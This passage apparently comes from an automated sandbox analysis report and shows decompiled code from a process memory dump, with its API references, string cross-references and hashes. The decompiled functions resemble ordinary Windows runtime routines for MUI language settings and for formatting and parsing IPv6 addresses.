						if(E008A8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E008A718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0088E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00882340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0089E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0088E2A8(_t322,  &_v68, _v16);
								if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0089E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0088E2A8(_t322,  &_v68, _t236);
								if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E008A718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0088E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00882340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0089E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0088E2A8(_v12,  &_v68, _v16);
							if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0089E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0088E2A8(_t322,  &_v68, _t269);
							if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E008A718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0088E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00882340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0089E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0088E2A8(_v12,  &_v68, _v16);
						if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0089E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0088E2A8(_t322,  &_v68, _t296);
						if(E008A5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x008a8788
0x008a8788
0x008a8791
0x008a8794
0x008a8798
0x008a879b
0x008a879e
0x008a87a1
0x008a87a4
0x008a87a7
0x008a87aa
0x008a87af
0x008f1ad3
0x008a8b0a
0x008a8b0d
0x008a8b13
0x008a8b19
0x008a8b1f
0x008a8b25
0x008a8b2b
0x008a8b31
0x008a8b37
0x008a8b3d
0x008a8b46
0x008a8b46
0x008a87c6
0x008a87d0
0x008f1ae0
0x008f1ae6
0x008f1af8
0x008f1af8
0x008f1afd
0x008f1afe
0x008f1b01
0x008f1b06
0x008f1b06
0x008a87d6
0x008a87f2
0x008a87f7
0x008a8807
0x008a880a
0x008a880f
0x008a8810
0x008a8813
0x008a8818
0x008a8818
0x008a882c
0x008a8831
0x008a8838
0x008a8908
0x008a8920
0x008a89f0
0x008a8a08
0x008a8af6
0x008a8af6
0x008a8af8
0x008a8afb
0x008f1beb
0x008f1beb
0x008a8b04
0x008f1bf8
0x008f1c0e
0x008f1c13
0x008f1c16
0x008f1c16
0x008f1bf8
0x00000000
0x008a8b04
0x008a8a0e
0x008a8a11
0x008a8a14
0x008a8a15
0x008a8a18
0x008a8a22
0x008a8b59
0x008a8a28
0x008a8a3c
0x008a8a3c
0x008a8a42
0x008f1bb0
0x008f1b11
0x008f1b11
0x00000000
0x008a8a48
0x008a8a51
0x008a8a5b
0x008a8a5e
0x008a8a61
0x008a8a69
0x008a8a69
0x008a8a6d
0x00000000
0x00000000
0x008a8a74
0x008a8a7c
0x008a8a7d
0x008a8a91
0x008a8a93
0x008a8a93
0x008a8a98
0x008a8a9b
0x008a8aa1
0x008a8aa1
0x008a8aa4
0x008a8aaa
0x008a8ab1
0x008a8ac5
0x008a8ac7
0x008a8ac7
0x008a8ac5
0x008a8ace
0x008f1bc9
0x008f1bce
0x008f1bd2
0x008f1bd2
0x008a8ad8
0x008a8aeb
0x008a8aeb
0x008a8af0
0x008a8af4
0x00000000
0x008a8af4
0x008a8a42
0x008a8926
0x008a8929
0x008a892c
0x008a892d
0x008a8930
0x008a8935
0x008a893a
0x008a8b51
0x008a8940
0x008a8954
0x008a8954
0x008a895a
0x008f1b63
0x00000000
0x008a8960
0x008a8969
0x008a8973
0x008a8976
0x008a8979
0x008a897e
0x008a8981
0x008a8981
0x008a8986
0x00000000
0x00000000
0x008f1b6e
0x008f1b74
0x008f1b7b
0x008f1b8f
0x008f1b91
0x008f1b91
0x008f1b99
0x008f1b9c
0x008f1ba2
0x008f1ba2
0x008a898c
0x008a8992
0x008a8999
0x008a89ad
0x008f1ba8
0x008f1ba8
0x008a89ad
0x008a89b6
0x008a89c8
0x008a89cd
0x008a89d0
0x008a89d0
0x008a89d6
0x008a89e8
0x008a89e8
0x008a89ed
0x00000000
0x008a89ed
0x008a895a
0x008a883e
0x008a8841
0x008a8844
0x008a8845
0x008a8848
0x008a884d
0x008a8852
0x008a8b49
0x008a8858
0x008a886c
0x008a886c
0x008a8872
0x008f1b0e
0x00000000
0x008a8878
0x008a8881
0x008a888b
0x008a888e
0x008a8891
0x008a8896
0x008a8899
0x008a8899
0x008a889e
0x00000000
0x00000000
0x008f1b21
0x008f1b27
0x008f1b2e
0x008f1b42
0x008f1b44
0x008f1b44
0x008f1b4c
0x008f1b4f
0x008f1b55
0x008f1b55
0x008a88a4
0x008a88aa
0x008a88b1
0x008a88c5
0x008f1b5b
0x008f1b5b
0x008a88c5
0x008a88ce
0x008a88e0
0x008a88e5
0x008a88e8
0x008a88e8
0x008a88ee
0x008a8900
0x008a8900
0x008a8905
0x00000000
0x008a8905

APIs

_wcspbrk.LIBCMT ref: 008A8891
_wcspbrk.LIBCMT ref: 008A8979
_wcspbrk.LIBCMT ref: 008A8A61
_wcspbrk.LIBCMT ref: 008A8A9B
_wcspbrk.LIBCMT ref: 008F1B9C

Strings

Kernel-MUI-Language-Disallowed, xrefs: 008A8914
WindowsExcludedProcs, xrefs: 008A87C1
Kernel-MUI-Language-SKU, xrefs: 008A89FC
Kernel-MUI-Language-Allowed, xrefs: 008A8827
Kernel-MUI-Number-Allowed, xrefs: 008A87E6

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: df8f2c5f109eda0afed49c87601ec1f2a2b10895b0cd85d2615bee60d0e9906f
Instruction ID: 989b61ecee265fce2babca7afe7351708cb19c59eed55a9116b792e6efbcda00
Opcode Fuzzy Hash: df8f2c5f109eda0afed49c87601ec1f2a2b10895b0cd85d2615bee60d0e9906f
Instruction Fuzzy Hash: 41F108B2D00209EFDF11EFA8C9819EEBBB8FF09304F14446AE505E7611EB359A45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008C13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E008C13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E008B7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x882926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E008B7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x889cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E008B7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E008B7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E008B7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E008B7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x008c13d5
0x008c13d9
0x008c13dc
0x008c13de
0x008c13e1
0x008c13e8
0x008c13ee
0x008ee8fd
0x00000000
0x008ee921
0x008ee921
0x008ee928
0x008ee982
0x008ee98a
0x00000000
0x008ee99a
0x008ee99e
0x008ee9a3
0x008ee9a8
0x008ee9b9
0x008ee978
0x00000000
0x008ee978
0x008ee98a
0x008ee92a
0x008ee931
0x008ee944
0x008ee944
0x008ee950
0x008ee954
0x008ee959
0x008ee95e
0x008ee963
0x008ee970
0x00000000
0x008ee975
0x008ee93b
0x008ee980
0x00000000
0x008ee980
0x008ee942
0x008ee94b
0x00000000
0x008ee94b
0x00000000
0x008ee942
0x008c13f4
0x008c13f4
0x008c13f9
0x008c13fc
0x008c13ff
0x008c1406
0x008ee9cc
0x008ee9d2
0x008ee9d2
0x008ee9cc
0x008c140c
0x008c1411
0x008c1431
0x008c143a
0x008c143c
0x008c143f
0x008c143f
0x008c1442
0x008c1447
0x008c14a8
0x008c14ac
0x008ee9e2
0x008ee9e7
0x008ee9ec
0x008eea05
0x008eea05
0x00000000
0x008c1449
0x00000000
0x008c1449
0x008c144c
0x008c1459
0x008c1462
0x008c1469
0x008c146a
0x008c1470
0x008c1473
0x008c1476
0x008c1476
0x008c1490
0x008c1495
0x008c138e
0x008c1390
0x008c1397
0x008c1398
0x008c1399
0x008c13a1
0x008c13a4
0x008c13a4
0x008c1498
0x008c149c
0x008c149f
0x008c14a2
0x00000000
0x00000000
0x008c14a4
0x00000000
0x008c14a4
0x008c1413
0x008c1415
0x008c1416
0x008c1419
0x008c141c
0x008c1422
0x008c13b7
0x008c13bc
0x008c13bf
0x008c13bf
0x008c13c2
0x008c1424
0x008c1424
0x008c1424
0x008c1427
0x008c142b
0x008c142c
0x008c142c
0x008c142c
0x00000000
0x008c141c
0x008c1411

APIs

___swprintf_l.LIBCMT ref: 008C146B
___swprintf_l.LIBCMT ref: 008C1490
___swprintf_l.LIBCMT ref: 008EE970

Strings

::%hs%u.%u.%u.%u, xrefs: 008EE967
:%u.%u.%u.%u, xrefs: 008EE9F4
::ffff:0:%u.%u.%u.%u, xrefs: 008EE9B0
ffff:, xrefs: 008EE94B

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
Instruction ID: 0d6d8136181e595b8646191786bf4fa643aa54d88bd7356b9060577c63683265
Opcode Fuzzy Hash: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
Instruction Fuzzy Hash: 5D610571900695AACF28DF69C8C4CBEBBB6FF96304718C16DE4D6C7642D634EA40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 008C0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00898980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							L0088DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E008C0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E008C0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E008C06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E008C06BA(_t135, _t178) == 0 || E008C0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E008C0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E008C0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E008C06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E008C06BA(_t124, _t142) == 0 || E008C0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x008c0b21
0x008c0b24
0x008c0b27
0x008c0b2a
0x008c0b2d
0x008c0b30
0x008c0b33
0x008c0b36
0x008c0b39
0x008c0b3e
0x008c0c65
0x008c0c68
0x008c0c6a
0x008c0c6f
0x008eeb42
0x00000000
0x00000000
0x008eeb48
0x008eeb48
0x008c0c75
0x008c0c7a
0x008eeb54
0x00000000
0x00000000
0x00000000
0x008eeb5a
0x008c0c80
0x008c0c84
0x008eeb98
0x00000000
0x00000000
0x008eeba6
0x008c0cb8
0x008c0cba
0x008c0cd3
0x008c0cda
0x008c0ce4
0x008c0ce9
0x00000000
0x008c0cec
0x008c0c8c
0x008eeb63
0x00000000
0x00000000
0x008eeb70
0x008eeb75
0x008eeb7d
0x00000000
0x00000000
0x008eeb8c
0x00000000
0x008eeb8c
0x008c0c96
0x00000000
0x00000000
0x008c0ca2
0x008c0cac
0x008c0cb4
0x00000000
0x00000000
0x008c0b44
0x008c0b47
0x008c0b49
0x00000000
0x00000000
0x008c0b4f
0x008c0b50
0x00000000
0x00000000
0x008c0b56
0x008c0b62
0x008c0b7c
0x008c0bac
0x008c0a0f
0x008eeaaa
0x00000000
0x008eeac4
0x008eeac4
0x008c0bd0
0x008c0bd0
0x008c0bd4
0x008c0bd9
0x00000000
0x00000000
0x008c0bdb
0x008c0be0
0x008eeb0e
0x008c0a1a
0x00000000
0x008c0a1a
0x008eeb1a
0x008eeb1f
0x008eeb27
0x00000000
0x00000000
0x008eeb36
0x00000000
0x008eeb36
0x008c0bea
0x00000000
0x00000000
0x008c0bf6
0x008c0c00
0x008c0c03
0x008c0c0b
0x00000000
0x008c0c0b
0x008eeaaa
0x00000000
0x008c0a15
0x008c0bb6
0x00000000
0x008c0bc6
0x008c0bc6
0x008c0bcb
0x008c0c15
0x00000000
0x00000000
0x008c0c1d
0x008c0c20
0x008c0c21
0x008c0c24
0x008c0c24
0x008c0c26
0x00000000
0x008c0c26
0x008c0bcd
0x00000000
0x008c0bcd
0x008c0b89
0x008c0b89
0x008c0b90
0x00000000
0x00000000
0x008c0b96
0x00000000
0x008c0b96
0x008c0a04
0x008c0a04
0x008c0b9a
0x008c0b9a
0x008c0b9b
0x008c0b9f
0x00000000
0x00000000
0x00000000
0x008c0ba5
0x008c0ac7
0x008c0aca
0x008eeacf
0x00000000
0x008eeade
0x008eeade
0x008eeae3
0x00000000
0x00000000
0x008eeaf3
0x008eeaf6
0x008eeaf7
0x008eeafe
0x008eeb01
0x00000000
0x008eeb01
0x008eeacf
0x008c0ad0
0x008c0ad4
0x00000000
0x00000000
0x008c0ada
0x008c0ae6
0x008c0c34
0x00000000
0x008c0c47
0x008c0c49
0x008c0c4a
0x008c0c4e
0x008c0c51
0x008c0c54
0x008c0c57
0x008c0c5a
0x00000000
0x00000000
0x00000000
0x008c0c60
0x008c0afb
0x008c0afe
0x008c0b02
0x008c0b05
0x008c0b08
0x00000000
0x008c0b08
0x008c0ae6
0x008c0b44
0x008c09f8
0x008c09f8
0x008c09f9
0x00000000
0x00000000
0x008eeaa0
0x00000000

APIs

__fassign.LIBCMT ref: 008C0BF6
__fassign.LIBCMT ref: 008C0CA2

Strings

., xrefs: 008C0A0C
:, xrefs: 008C0BA9
:, xrefs: 008C0AC7

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 8fd7c43a5d879553d9dd3548392db894cefb4e9d4a80d6b0b37766c991082b52
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 3AA19B71D0031AEBCB24DFA8C845BAEB7B4FB05395F24856ED842E7282D630DA41CF52

Uniqueness

Uniqueness Score: -1.00%

Function 008C0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E008C0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
